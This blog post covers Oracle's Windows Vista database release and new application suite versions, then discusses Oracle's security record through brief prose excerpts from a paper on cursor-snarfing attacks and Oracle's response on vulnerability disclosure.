If you’re using Oracle database and the operating system of your computer desktop is Windows Vista, a great news is Oracle has released its EE/SE (Enterprise/Standard Edition) for Windows Vista. You can download it by clicking here.

According to the press release of Oracle, Oracle has released the new versions of its five product lines, i.e. Oracle E-Business Suite Release 12, Oracle’s PeopleSoft Enterprise Release 9.0, Siebel CRM 8.0, JD EDwards EnterpriseOne 8.12 and JD Edwards World A9.1.

Some excerpts from the press release (The product details):

- Oracle E-Business Suite Release 12: Oracle has released 18 new products and 2443 new enhancements to help global businesses think globally for better decision-making, work globally to be more competitive and manage globally to lower cost and increase performance.

- PeopleSoft Enterprise Release 9.0: It included PeopleSoft Enterprise Human Capital Management (HCM) 9.0. PeopleSoft Enterprise Release 9 contains 2 new products and 1478 enhancements. The new release of PeopleSoft Enterprise HCM delivers enterprise-wide talent management capabilities and, like the other applications in PeopleSoft Enterprise 9, leverages Oracle Fusion Middleware to give customers a comprehensive, standards-based platform to address the challenges of disparate technologies and applications.

- Siebel CRM 8: The new release of the Siebel CRM suite offers ten new products and 366 enhancements that extend Oracle’s investment in industry-specific CRM and enable companies to propel business growth through customer-driven business transformation. The new release accelerates user adoption, enhances business responsiveness and delivers increased value to the enterprise with a new task-based user interface, enterprise search capabilities, SOA-enabled CRM and embedded intelligence driving real-time insight at the moment of customer interaction.

- JD Edwards World A9.1: The first major release of JD Edwards World in ten years, this new version offers 4 new products and 1297 enhancements that provide customers with compliance support, operational excellence, technology improvements and capabilities for global operations.

- JD Edwards EnterpriseOne 8.12: Delivered in the spring of 2006, the latest release of JD Edwards EnterpriseOne delivered 5 new products, including a new Operational Sourcing and three new modules for the food and beverage industry, as well as 291 enhancements.

In the bigger picture, one of the best offer Oracle did to its customers is: The customers have the options of upgrading the respective softwares without having to re-license their Oracle application. This may be the first time ever in the software history, but in the long term, will help Oracle win the loyalty war with the customers.

However, the above products released may not the new customers that they want to buy, I always believe most of the new customers are waiting for the new release of Oracle Database.

There are several articles pertaining to Oracle security issues, unsurprisingly, you will come across an article entitled, “Oracle has more flaws than SQL Server”, or “Oracle databases four times worse than Microsoft” and similar type of articles on the web. I just came across an research paper, entitled, “Dangling Cursor Snarfing: A New Class of Attack in Oracle” (pdf). Some excerpts:

we’ll now execute it as a low privileged user - but when we do so we’ll cause an exception in it by passing it too long a string:

The session now has a dangling cursor which can be snarfed by an attacker. Note from the output of PWD_COMPARE that the cursor has a value of 3 in this case. Incidentally,
even without seeing it’s 3 an attacker can still “guess” the value for the dangling cursor by going from 1 to n in a loop until they find it. When the attacker finds the dangling cursor, they can then recycle it – in other words they can rebind the username associated with the query and this time use SYS if they so choose.

My sense is that the above research study pessimistically stated the attack based on the two following assumptions below:

1) The database administrator (DBA) and security managers didn’t do their job and hence, allow an attacker a manner to steal the confidential data.

2) Users’ own problems. They failed to or improperly close the cursors that they created or failed to clean up the open cursors. Thus, we need to educate the users in using Oracle database properly.

In such above analysis, why we need to blame Oracle? If we regularly patch and secure the database’s configuration, we will be reasonably protected from the above attack.

Meanwhile, Oracle hits back at the above security critics by wrote a blog posting in response to the above security issues. Some excerpts:

Because software engineering is a complex discipline, the absence of security flaws in released software cannot be fully guaranteed. Such flaws may be detected during internal testing, or may be discovered externally by customers and security researchers. Regardless of who discovers these issues, Oracle’s top priority is to efficiently fix those flaws across all supported platforms in order to allow customers to maintain their security posture. This means that Oracle prioritizes those security flaws in order of severity, regardless of how they were discovered, in order to produce the appropriate fix. This also means that we acknowledge all of the vulnerabilities at the time of the issuance of the appropriate fix (for example, at the time of the Critical Patch Update) and we credit security researchers for any vulnerability they discovered in the Critical Patch Update documentation.

However, we do not credit security researchers who disclose the existence of vulnerabilities before a fix is available. We consider such practices, including disclosing “zero day” exploits, to be irresponsible as they can result in needlessly exposing customers to risk of attack.

My view is it is too early to say Oracle do not care about fixing their bugs, it is just the customers that dissatisfied with the Oracle’s security record. On the other hand, I really believed Oracle are getting better in manage the vulnerabilities in their products. If there are reports that stated bug found in Oracle’s products, whom have we to find fault with? The researchers that should bear the social responsibility? Or Oracle that did not release the most updated security patch? Or the customers that are not patch and secure their configuration in their databases? Moreover, if there has been a large scale attack targeting Oracle databases, we definitely been heard the Oracle customers switching to the competing products in the market.